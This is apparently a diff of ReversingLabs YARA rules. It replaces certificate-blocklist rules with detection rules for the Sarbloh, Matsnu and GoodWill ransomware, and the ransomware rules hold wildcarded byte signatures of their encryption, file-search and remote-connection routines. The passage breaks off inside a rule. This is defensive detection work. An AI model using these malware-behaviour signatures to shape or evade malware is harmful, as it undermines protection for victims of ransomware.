-		id = "bee69e9d-db8e-5d4e-8e97-b3791b4f717d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "532abd77-f091-5c54-87a3-7e8be5253efd"
+		date = "2021-05-21"
+		modified = "2021-05-21"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2468-L2484"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b66c4b9264be70d53838442a3112c4bacbdf2dda90840d71c3eb949e630b3f17"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Sarbloh.yara#L1-L88"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7259aa9d1fe657db220ee50f1610e6439ff61673d92f46ebc3b8cadd990f002c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Sarbloh"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 75 ?? 72 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ??
+            ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 75
+            ?? 81 FE ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? C1 E6 ?? 56 6A ?? 89 75 ?? FF 15 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 8D 85 ?? ?? ?? ??
+            6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B
+            8D ?? ?? ?? ?? 8B C1 8B 55 ?? 0B C2 89 4D ?? 89 55 ?? 0F 84 ?? ?? ?? ?? 0F 57 C0 66
+            0F 13 45 ?? 85 D2 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 45 ??
+            8B 45 ?? 89 45 ?? EB ?? 8B 75 ?? 8B 7D ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ??
+            50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 89 4D ?? 89 45 ??
+            85 C0 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 82 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85
+            ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 6A ?? 6A ?? 56 8B 75 ??
+            8D 45 ?? 56 50 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 0F
+            85 ?? ?? ?? ?? 8B 75 ?? EB ?? 33 F6 8B 45 ?? 8B 4D ?? 89 75 ?? 89 4D ?? 89 45 ?? 85
+            C0 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 82 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85 ??
+            ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 33 FF 85 C0 0F 88 ?? ?? ?? ?? 85 F6 0F 84
+        }
+		$encrypt_files_p2 = {
+            8B 75 ?? 8D 45 ?? 56 50 53 52 6A ?? 52 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 56 53 8D 45 ?? 50 6A ?? 6A ?? 6A ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 4D ??
+            81 C7 ?? ?? ?? ?? 3B 7D ?? 72 ?? 8B 75 ?? 03 75 ?? 8B 45 ?? 83 D0 ?? 89 75 ?? 89 45
+            ?? 3B 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B B5 ?? ?? ?? ?? 8B 75 ?? 0F 82 ?? ?? ?? ?? 8D
+            45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? F7 D8 6A ?? 1B DB 8D 45
+            ?? 23 5D ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? 89 5D ?? 89 5D ?? FF 15 ?? ?? ?? ??
+            F7 D8 1B F6 23 75 ?? 56 6A ?? 89 75 ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8
+            85 FF 0F 84 ?? ?? ?? ?? 8D 45 ?? 89 5D ?? 50 57 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 89 5D ?? 50 57 6A ?? 6A ?? 6A ?? FF 75
+            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 56 57 8D 45 ?? 50 6A ?? 6A
+            ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 78 ?? 39 75 ?? 75 ??
+            8B 85 ?? ?? ?? ?? 6A ?? 6A ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 6A ?? 89 85 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 8D 45 ?? 89 9D ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? FF 75 ?? 89 B5 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 78 ?? 33 C0 B9 ?? ?? ?? ?? 83
+            7D ?? ?? 0F 44 C1 89 45 ?? 89 7D ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 03 4D ?? 39 4D ?? 73
+            ?? 90 8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 4D ?? 72 ?? 57 6A ?? FF 15 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 8B 75 ?? EB
+        }
+		$find_files_p1 = {
+            55 8B EC 83 EC ?? 53 56 8B 75 ?? 57 8B F9 83 3E ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D
+            45 ?? 50 52 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 89 45 ?? 8D
+            45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0F 89 4D ?? 85 C0 78 ??
+            83 F9 ?? 74 ?? FF 75 ?? BB ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 8B 55 ?? EB ?? FF 75 ?? C7 06 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 8B 17 33 DB 89 55 ?? C7 45
+            ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? 39 4D ?? 73
+        }
+		$find_files_p2 = {
+            8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 4D ?? 72 ?? 53 6A ?? 6A ?? 6A ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 8B F8 33 DB
+            89 5D ?? 81 FF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 85 FF 78 ?? 8B 4D ?? 8B 35 ??
+            ?? ?? ?? 2B CB 0F 84 ?? ?? ?? ?? 83 E9 ?? 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B C1
+            C1 E8 ?? F7 D0 A8 ?? 74 ?? F7 C1 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 74 ?? 83 FE
+            ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 C0
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE8\\x80\\x98\\xE5\\x8D\\x87\\xE5\\xA4\\xA9\\xE4\\xB8\\x8B\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "1b:e4:1b:34:12:7c:a9:e6:27:08:30:d2:07:0d:b4:26" and 1352764799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_9B108B8A1Daa0D5581F59Fcee0447901 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Matsnu : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Matsnu ransomware."
 		author = "ReversingLabs"
-		id = "cacb2af8-dbc6-5d61-a2d5-641c5c09bc79"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "2f0bddd5-bd48-5d38-84f4-2dbccbe04a46"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2486-L2504"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "696e3da511f74f9cfb10b96130a36ae9f48c22f1e0deb76092db1262980ab3ac"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Matsnu.yara#L1-L116"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "76ef1b4a292f27ccd904e80f0279a7a327f7399a21f2266ef3ea959e5339ffac"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Matsnu"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection = {
+            55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C6 45 ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B 8D 83 ?? ?? ?? ?? 8B 00 6A ?? 50
+            FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D 7D ?? 57 56 FF 93 ?? ?? ?? ?? 85 C0 74
+            ?? 57 8D BB ?? ?? ?? ?? 89 07 5F EB ?? 8D B3 ?? ?? ?? ?? 8B 36 57 8D BB ?? ?? ?? ??
+            89 37 5F 68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? EB ?? 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? 57 FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 56
+            57 FF 93 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 50 57 FF 93 ?? ?? ?? ?? 85
+            C0 74 ?? C6 00 ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8D 93 ?? ??
+            ?? ?? FF 75 ?? 52 51 56 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 4D ?? 51 57 E8 ??
+            ?? ?? ?? 85 C0 74 ?? 89 45 ?? 8D 4D ?? 51 50 E8 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF
+            93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 89 85 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ??
+            ?? 8B 45 ?? 8B 75 ?? 89 06 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 83 BD ??
+            ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D 83 ?? ?? ?? ?? 50 56 FF
+            93 ?? ?? ?? ?? 85 C0 74 ?? 40 57 8D BB ?? ?? ?? ?? 89 07 5F E9 ?? ?? ?? ?? 8D B3 ??
+            ?? ?? ?? 8B 36 57 8D BB ?? ?? ?? ?? 89 37 5F 68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8D 83 ?? ?? ?? ?? 8B 00 50 FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ??
+            ?? ?? C9 C2
+        }
+		$crypto_file = {
+            55 89 E5 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ??
+            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? E8
+            ?? ?? ?? ?? 5B 8D 83 ?? ?? ?? ?? 8B 00 85 C0 74 ?? 89 45 ?? 8D 83 ?? ?? ?? ?? 8B 00
+            85 C0 74 ?? 8D 7D ?? 8D 75 ?? 8D 4D ?? 51 56 57 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 74 ??
+            89 45 ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? FF 75 ??
+            FF 93 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? 8B 45
+            ?? 8B 5D ?? C9 C2
+        }
+		$crypt_file = {
+            55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            5B 8D BD ?? ?? ?? ?? FF 75 ?? 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D B3 ?? ?? ??
+            ?? 56 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 93 ?? ?? ?? ?? 89 45 ?? 8D 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 30 FF 93 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 4D ?? 8D 85 ?? ?? ?? ?? 6A ??
+            FF 31 50 FF 36 FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 8D B5 ?? ?? ?? ?? 51 6A ?? FF 36 68 ?? ?? ?? ?? FF 30 FF 93 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 89 45
+            ?? 6A ?? FF 75 ?? FF 93 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF
+            75 ?? FF 93 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 45 ?? 8D 7D ?? 8D 75 ?? 8D 55
+            ?? 52 56 57 FF 75 ?? FF 93 ?? ?? ?? ?? 8B 45 ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D
+            45 ?? 6A ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            FF 75 ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 8D 7D ?? 8D B5 ?? ?? ?? ?? FF 75 ?? 57 FF 75 ?? 6A ?? 6A
+            ?? 6A ?? FF 36 FF 93 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
+            ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 45 ?? 8D 45 ?? 6A ?? 50 FF 75 ??
+            FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 85 C0 74 ?? 8D 7D ?? 8D 75 ?? 8D 55 ?? 52 56 57
+            FF 75 ?? FF 93 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D B3 ??
+            ?? ?? ?? FF 06 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 93 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 50 FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 50 FF 93 ?? ?? ?? ??
+            83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2
+        }
+		$enum_files_1 = {
+            89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B E8 ??
+            ?? ?? ?? 8D 7D ?? 6A ?? FF 75 ?? 57 FF 93 ?? ?? ?? ?? 8D 7D ?? 57 FF 93 ?? ?? ?? ??
+            83 F8 ?? 74 ?? EB ?? 8D 75 ?? 56 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2
+        }
+		$enum_files_2 = {
+            55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
+            66 C7 45 ?? ?? ?? C6 45 ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B 83 7D ?? ?? 0F 84
+            ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 C0 ?? 89 45 ?? 40 50 6A ?? FF 93 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 89 45 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8D 75 ?? 56
+            FF 75 ?? FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 75 ?? FF 93 ?? ?? ?? ?? 83 F8 ??
+            0F 84 ?? ?? ?? ?? 89 45 ?? 6A ?? FF 93 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 55 ?? 8D B5
+            ?? ?? ?? ?? 52 56 FF 93 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 55 ?? 8D B5 ?? ?? ?? ?? 52
+            56 FF 93 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 40 89 45 ?? 8D BD
+            ?? ?? ?? ?? 57 FF 93 ?? ?? ?? ?? 03 45 ?? 89 45 ?? 40 50 6A ?? FF 93 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 89 45 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8D 75 ?? 56 FF 75
+            ?? FF 93 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 56 FF 75 ?? FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? A9 ?? ?? ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? E8 ?? ?? ?? ??
+            EB ?? 8D B5 ?? ?? ?? ?? FF 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75
+            ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 75 ?? FF 93 ?? ??
+            ?? ?? 85 C0 74 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF
+            75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74
+            ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CharacTell Ltd" and ( pe.signatures [ i ] . serial == "00:9b:10:8b:8a:1d:aa:0d:55:81:f5:9f:ce:e0:44:79:01" or pe.signatures [ i ] . serial == "9b:10:8b:8a:1d:aa:0d:55:81:f5:9f:ce:e0:44:79:01" ) and 1380671999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $enum_files_1 and $enum_files_2 and $crypto_file and $crypt_file and $remote_connection
 }
-
-rule REVERSINGLABS_Cert_Blocklist_5F8203C430Fc7Db4E61F6684F6829Ffc : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Goodwill : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GoodWill ransomware."
 		author = "ReversingLabs"
-		id = "975cd500-2f08-55c9-a821-4dde3a54ae0c"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "66358802-450b-5276-8088-b3550519b1e8"
+		date = "2022-06-28"
+		modified = "2022-06-28"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2506-L2522"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cd22d1beea12d1f6c50f69e76074c2582ce5567887056c43d4d6c87d33fce1bf"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.GoodWill.yara#L1-L89"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "94e2950f415ba737fe5ca9d32a3d850dd5744e547c4ca094ad28545e19033cb2"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GoodWill"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_file = {
+            02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F
+            ?? ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 0B 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 02 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 07 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ?? 26 72 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 2A
+        }
+		$aes_encrypt = {
+            14 0A 03 0B 73 ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ??
+            ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ?? ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ??
+            11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ??
+            ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ??
+            ?? ?? ?? DC 06 2A
+        }
+		$find_files_p1 = {
+            28 ?? ?? ?? ?? 0A 1F ?? 28 ?? ?? ?? ?? 0B 18 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25
+            17 72 ?? ?? ?? ?? A2 0C 06 0D 16 13 ?? 38 ?? ?? ?? ?? 09 11 ?? 9A 13 ?? 11 ?? 6F ?? ??
+            ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11
+            ?? 28 ?? ?? ?? ?? 08 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 28 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ??
+            ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ??
